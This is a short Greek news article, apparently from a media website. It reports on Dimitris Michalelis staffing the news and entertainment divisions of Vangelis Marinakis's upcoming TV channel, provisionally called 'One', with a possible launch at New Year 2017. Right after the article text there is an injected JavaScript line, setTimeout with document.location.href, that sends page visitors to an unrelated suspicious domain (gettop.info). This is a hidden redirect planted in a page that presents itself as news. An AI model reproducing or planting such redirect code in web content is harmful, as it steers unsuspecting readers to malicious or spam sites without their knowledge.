Φουλάρει τις μηχανές ο Μιχαλέλης στο κανάλι του Μαρινάκη…

0
42
Με φουλ τις μηχανές έχει ξεκινήσει τις επαφές του ο Δημήτρης Μιχαλέλης, διευθυντής ειδήσεων και ενημέρωσης τού υπό σύσταση καναλιού του Βαγγέλη Μαρινάκη, ενώ ταυτόχρονα γίνονται συζητήσεις για τη στελέχωση του ψυχαγωγικού τμήματος και μπαίνουν στην τελική τους φάση οι οικοδομικές εργασίες στα στούντιο της Παιανίας των αδελφών Νίνου και Χρήστου Ελματζιόγλου, από όπου θα βγαίνει στον «αέρα» ο σταθμός.
Ο επικεφαλής του ενημερωτικού τομέα συνομιλεί με δημοσιογράφους που αυτή τη στιγμή είναι ελεύθεροι, αλλά και με άλλους που στελεχώνουν τηλεοπτικά δίκτυα σε λειτουργία. Το βασικό πλεονέκτημά του είναι ότι έχει τα χέρια του λυμένα και μπορεί να κάνει επιλογές από μηδενική βάση. Και σε ρεπόρτερ και σε αρχισυντάκτες, και σε παρουσιαστές ειδήσεων και εκπομπών.
Γνωρίζει καλά το δυναμικό του Μega -οι άνθρωποι του οποίου είναι ελεύθεροι και, άρα, διαθέσιμοι- όπως επίσης και αξιόλογα πρόσωπα από άλλα κανάλια. Όταν ανακοινωθούν τα ονόματα, πολλοί ίσως εκπλαγούν.
Εργώδεις είναι οι προσπάθειες και για τη συγκρότηση του ψυχαγωγικού τομέα, με την προσοχή στραμμένη σε έμπειρα στελέχη όπως η  Έλενα Κατραβά και ο Λοίζος Ξενόπουλος, που λέγεται ότι βρίσκονται ήδη με το ένα πόδι στο κανάλι του ιδιοκτήτη του Ολυμπιακού.
Το προσωρινό όνομα του σταθμού είναι One, αλλά έως την ημέρα που θα ξεκινήσει το πρόγραμμά του πολλά είναι πιθανό να έχουν αλλάξει. Και πότε θα εκπέμψει; Αν συνυπολογίσει κανείς το χρόνο που θα απαιτηθεί για να έλθουν τα μηχανήματα από το εξωτερικό και να μονταριστούν, τον χρόνο για να «δέσουν» οι ομάδες του ενημερωτικού και ψυχαγωγικού τομέα και το χρόνο για να ολοκληρωθεί η διαμόρφωση στα στούντιο της Παιανίας, μια καλή ημερομηνία θα μπορούσε να είναι η Πρωτοχρονιά του 2017

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here